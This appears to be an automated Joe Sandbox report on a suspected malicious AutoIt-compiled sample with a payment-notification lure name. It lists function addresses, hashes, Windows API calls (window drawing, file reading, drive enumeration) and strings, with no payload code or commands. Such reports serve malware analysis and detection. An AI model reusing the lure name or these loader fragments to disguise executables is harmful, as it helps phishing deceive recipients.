Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ae3b8361b2b27ee59a90da09b81bf58bc2460ad6999d6a41293dece6c9ab8cc
Instruction ID: 6b4298dc958e40a1b969f619d7d4ab3822572a260f3168f20bc5e2b4d13685ca
Opcode Fuzzy Hash: 9ae3b8361b2b27ee59a90da09b81bf58bc2460ad6999d6a41293dece6c9ab8cc
Instruction Fuzzy Hash: FA61567160870956EA34DAEBB895BBFE39CDF81303F140D19EC82DB281DA159F4E8315

Function 00957CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f77d25ab306e0ed3e15a1344099ca130c5c158cb31bb23f13ddc3f843fd59c3
Instruction ID: 66c14c6d399364fac76e2ecea15c195031053b6df4a4e28a8f480167cbed4340
Opcode Fuzzy Hash: 2f77d25ab306e0ed3e15a1344099ca130c5c158cb31bb23f13ddc3f843fd59c3
Instruction Fuzzy Hash: CB61596120870966DA34CAEB7856BBFE3AC9F42703F100D59EC42DB2D1E6169F4EC355

Function 00951706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 938fed9171694ccba1c2d19f2bede81f78851aeb96561cd1561feef700d0eef6
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: C88176765080A30ADB2DC23F853467EFFE55A923A371A079ED8F2CA1C1EE14995CD720

Function 01316FC0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1320204766.0000000001313000.00000040.00000020.00020000.00000000.sdmp, Offset: 01313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1313000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: ab5182fa11351e68568cff56db2b11df5355cec5e20521f5ef4a5a5dbbb5227f
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: D441C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB40

Function 009A2046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf460974d914bbc93eb6492494ab218569344f5909d4113ea4336853546b4440
Instruction ID: 1df6f3b9d1fc2b1eedda0bfc2d4632683a3c91fa21d99d853039ae58c5920575
Opcode Fuzzy Hash: cf460974d914bbc93eb6492494ab218569344f5909d4113ea4336853546b4440
Instruction Fuzzy Hash: EE21A5326206158BD728CF79C82677A73E9AB54310F15862EE4A7C37D1DE7AA905CB80

Function 01316EB0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1320204766.0000000001313000.00000040.00000020.00020000.00000000.sdmp, Offset: 01313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1313000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 2ac8b77bec24769ef4d462268e24e927aa69d78e6caf54699ba3dc259142b134
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 9601D2B8A00109EFCB48DF98C6809AEF7B5FB48314F208299E819A7705D730AE41CB80

Function 01316E50 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1320204766.0000000001313000.00000040.00000020.00020000.00000000.sdmp, Offset: 01313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1313000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: e37a92122ada0745386d2ede857f4f99ef6db09a0e83394d1c6782ad20e13fa9
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 7E019278A00109EFCB48DF98C6919AEF7F5FF48314F208699D819A7705D730AE41DB90

Function 013157C0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1320204766.0000000001313000.00000040.00000020.00020000.00000000.sdmp, Offset: 01313000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1313000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 009B2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 009B2B30
DeleteObject.GDI32(00000000), ref: 009B2B43
DestroyWindow.USER32 ref: 009B2B52
GetDesktopWindow.USER32 ref: 009B2B6D
GetWindowRect.USER32(00000000), ref: 009B2B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 009B2CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 009B2CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009B2CF8
GetClientRect.USER32(00000000,?), ref: 009B2D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009B2D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009B2D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009B2D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009B2D80
GlobalLock.KERNEL32(00000000), ref: 009B2D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009B2D98
GlobalUnlock.KERNEL32(00000000), ref: 009B2DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009B2DA8
GlobalFree.KERNEL32(00000000), ref: 009B2DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009B2DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,009CFC38,00000000), ref: 009B2DDB
GlobalFree.KERNEL32(00000000), ref: 009B2DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 009B2E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 009B2E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009B2E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009B303F

Strings

static, xrefs: 009B2D3A, 009B2E91
, xrefs: 009B2FC5
DISPLAY, xrefs: 009B2EA2
AutoIt v3, xrefs: 009B2CF2

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 8e490b37cf7d302b8048df0173533c7ae6ae6d9bb0cb357c9c709a260be07986
Instruction ID: 1174dadeb981bc4c00399d0bff781814eb4a2af251c25534a9f435337bf8fb2e
Opcode Fuzzy Hash: 8e490b37cf7d302b8048df0173533c7ae6ae6d9bb0cb357c9c709a260be07986
Instruction Fuzzy Hash: 32027EB5910219AFDB14DFA4CD89EAE7BB9EF49310F048558F919AB2A1CB34DD01CF60

Function 009C70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 009C712F
GetSysColorBrush.USER32(0000000F), ref: 009C7160
GetSysColor.USER32(0000000F), ref: 009C716C
SetBkColor.GDI32(?,000000FF), ref: 009C7186
SelectObject.GDI32(?,?), ref: 009C7195
InflateRect.USER32(?,000000FF,000000FF), ref: 009C71C0
GetSysColor.USER32(00000010), ref: 009C71C8
CreateSolidBrush.GDI32(00000000), ref: 009C71CF
FrameRect.USER32(?,?,00000000), ref: 009C71DE
DeleteObject.GDI32(00000000), ref: 009C71E5
InflateRect.USER32(?,000000FE,000000FE), ref: 009C7230
FillRect.USER32(?,?,?), ref: 009C7262
GetWindowLongW.USER32(?,000000F0), ref: 009C7284

Part of subcall function 009C73E8: GetSysColor.USER32(00000012), ref: 009C7421
Part of subcall function 009C73E8: SetTextColor.GDI32(?,?), ref: 009C7425
Part of subcall function 009C73E8: GetSysColorBrush.USER32(0000000F), ref: 009C743B
Part of subcall function 009C73E8: GetSysColor.USER32(0000000F), ref: 009C7446
Part of subcall function 009C73E8: GetSysColor.USER32(00000011), ref: 009C7463
Part of subcall function 009C73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 009C7471
Part of subcall function 009C73E8: SelectObject.GDI32(?,00000000), ref: 009C7482
Part of subcall function 009C73E8: SetBkColor.GDI32(?,00000000), ref: 009C748B
Part of subcall function 009C73E8: SelectObject.GDI32(?,?), ref: 009C7498
Part of subcall function 009C73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 009C74B7
Part of subcall function 009C73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009C74CE
Part of subcall function 009C73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 009C74DB

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: a88dc1efa06abad5c4d43a0a730bb0ba8038b205b40e56558d5a9c3f14315083
Instruction ID: df98e650fd10c76301cfe6215aecc376c85084fecf2bd861acf180d4e6b93759
Opcode Fuzzy Hash: a88dc1efa06abad5c4d43a0a730bb0ba8038b205b40e56558d5a9c3f14315083
Instruction Fuzzy Hash: B3A1A1B281C301AFDB009FA0DC48F5BBBA9FB49321F140A19F966961E1D734E944DF52

Function 00948D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00948E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00986AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00986AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00986F43

Part of subcall function 00948F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00948BE8,?,00000000,?,?,?,?,00948BBA,00000000,?), ref: 00948FC5

SendMessageW.USER32(?,00001053), ref: 00986F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00986F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00986FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00986FB7

Strings

0, xrefs: 00986DCF

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 6f9189851e2edc2ef78e0f3deb070c18bb434bf7cc18716cfc444b43d1a39f48
Instruction ID: 9a268000636b58fce3affad7e7fdae1e8908079eb88718007bc26837c7ffe4b8
Opcode Fuzzy Hash: 6f9189851e2edc2ef78e0f3deb070c18bb434bf7cc18716cfc444b43d1a39f48
Instruction Fuzzy Hash: 58129A70604201EFDB25EF24C994FAABBE9FB44300F144469F5899B762CB35EC92DB91

Function 009B2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 009B273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009B286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 009B28A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 009B28B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 009B2900
GetClientRect.USER32(00000000,?), ref: 009B290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 009B2955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009B2964
GetStockObject.GDI32(00000011), ref: 009B2974
SelectObject.GDI32(00000000,00000000), ref: 009B2978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 009B2988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009B2991
DeleteDC.GDI32(00000000), ref: 009B299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009B29C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 009B29DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 009B2A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 009B2A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 009B2A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 009B2A77
GetStockObject.GDI32(00000011), ref: 009B2A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009B2A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 009B2A97

Strings

static, xrefs: 009B294F, 009B2A71
DISPLAY, xrefs: 009B295A
AutoIt v3, xrefs: 009B28F8
msctls_progress32, xrefs: 009B2A13

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 15d19508b3181672d0befc0fbfce0407e0c4c380eea9419d537b6b19471bd1b2
Instruction ID: a184b87e5634c2e6ec9cf29e6bd4ed6afafb5979b996b1188bedce15d3c9d4fb
Opcode Fuzzy Hash: 15d19508b3181672d0befc0fbfce0407e0c4c380eea9419d537b6b19471bd1b2
Instruction Fuzzy Hash: 1BB14EB1A10219AFEB14DFA9CD89FAE7BA9EB48710F004114F915EB290D774ED41CFA4

Function 009A4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009A4AED
GetDriveTypeW.KERNEL32(?,009CCB68,?,\\.\,009CCC08), ref: 009A4BCA
SetErrorMode.KERNEL32(00000000,009CCB68,?,\\.\,009CCC08), ref: 009A4D36

Strings

SAS, xrefs: 009A4CC9
Network, xrefs: 009A4C02
RAMDisk, xrefs: 009A4BF4
USB, xrefs: 009A4CB4
iSCSI, xrefs: 009A4CC2
SSD, xrefs: 009A4C4A
SSA, xrefs: 009A4CA6
PhysicalDrive, xrefs: 009A4B76
Virtual, xrefs: 009A4CE5
ATA, xrefs: 009A4C98
SCSI, xrefs: 009A4C8A
Unknown, xrefs: 009A4BED, 009A4C83
Fibre, xrefs: 009A4CAD
SATA, xrefs: 009A4CD0
ATAPI, xrefs: 009A4C91
Removable, xrefs: 009A4C10, 009A4C15
CDROM, xrefs: 009A4BFB
1394, xrefs: 009A4C9F
\\.\, xrefs: 009A4B3F
RAID, xrefs: 009A4CBB
MMC, xrefs: 009A4CDE
Fixed, xrefs: 009A4C09
FileBackedVirtual, xrefs: 009A4CEC

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: cdd9585bb4341d8130a5f079cfd7d8539614087661e408eb86acac1c266997dc
Instruction ID: 0115ef2a4560cf94cf7698387e70fef9a1c7009184d922ada2dba813dcbd1f0d
Opcode Fuzzy Hash: cdd9585bb4341d8130a5f079cfd7d8539614087661e408eb86acac1c266997dc
Instruction Fuzzy Hash: C1610530605309DBCB04DF28C981EBC77B0ABC6354B248815F98EAB691DBB9ED41DBD1

Function 009C73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 009C7421
SetTextColor.GDI32(?,?), ref: 009C7425
GetSysColorBrush.USER32(0000000F), ref: 009C743B
GetSysColor.USER32(0000000F), ref: 009C7446
CreateSolidBrush.GDI32(?), ref: 009C744B
GetSysColor.USER32(00000011), ref: 009C7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 009C7471
SelectObject.GDI32(?,00000000), ref: 009C7482
SetBkColor.GDI32(?,00000000), ref: 009C748B
SelectObject.GDI32(?,?), ref: 009C7498
InflateRect.USER32(?,000000FF,000000FF), ref: 009C74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009C74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 009C74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009C752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 009C7554
InflateRect.USER32(?,000000FD,000000FD), ref: 009C7572
DrawFocusRect.USER32(?,?), ref: 009C757D
GetSysColor.USER32(00000011), ref: 009C758E
SetTextColor.GDI32(?,00000000), ref: 009C7596
DrawTextW.USER32(?,009C70F5,000000FF,?,00000000), ref: 009C75A8
SelectObject.GDI32(?,?), ref: 009C75BF
DeleteObject.GDI32(?), ref: 009C75CA
SelectObject.GDI32(?,?), ref: 009C75D0
DeleteObject.GDI32(?), ref: 009C75D5
SetTextColor.GDI32(?,?), ref: 009C75DB
SetBkColor.GDI32(?,?), ref: 009C75E5

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: b9fda13a74a706f7f5041e5cd3fdaf1125f504d4b2bae0fae8c84e5f8e13ceeb
Instruction ID: d0763ba2fe8908342abe330f32e4a2cd6923d06dab27d963e85b04bd57a49baf
Opcode Fuzzy Hash: b9fda13a74a706f7f5041e5cd3fdaf1125f504d4b2bae0fae8c84e5f8e13ceeb
Instruction Fuzzy Hash: AC615BB2D08218AFDF019FA4DC49EEEBFB9EB08320F154515F915AB2A2D7749940DF90

Function 009C0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 009C1128
GetDesktopWindow.USER32 ref: 009C113D
GetWindowRect.USER32(00000000), ref: 009C1144
GetWindowLongW.USER32(?,000000F0), ref: 009C1199
DestroyWindow.USER32(?), ref: 009C11B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009C11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009C120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009C121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 009C1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 009C1245
IsWindowVisible.USER32(00000000), ref: 009C12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009C12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009C12D0
GetWindowRect.USER32(00000000,?), ref: 009C12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 009C130E
GetMonitorInfoW.USER32(00000000,?), ref: 009C1328
CopyRect.USER32(?,?), ref: 009C133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 009C13AA

Strings

tooltips_class32, xrefs: 009C11E6
0, xrefs: 009C10D3
(, xrefs: 009C131B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 6459991d6078b0a0683fe53f2d050f125cf3f1b8be616ea1bccb550427de00bd
Instruction ID: c504649a986ab7a639fe72a3d640744e656d9aaee8336ca4ff1c664a272d903e
Opcode Fuzzy Hash: 6459991d6078b0a0683fe53f2d050f125cf3f1b8be616ea1bccb550427de00bd
Instruction Fuzzy Hash: 32B17971A08341AFD714DF64C984F6ABBE4EF85354F00891CF9999B2A2C771E844CFA6

Function 009C0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009C02E5
_wcslen.LIBCMT ref: 009C031F
_wcslen.LIBCMT ref: 009C0389
_wcslen.LIBCMT ref: 009C03F1
_wcslen.LIBCMT ref: 009C0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009C04C5
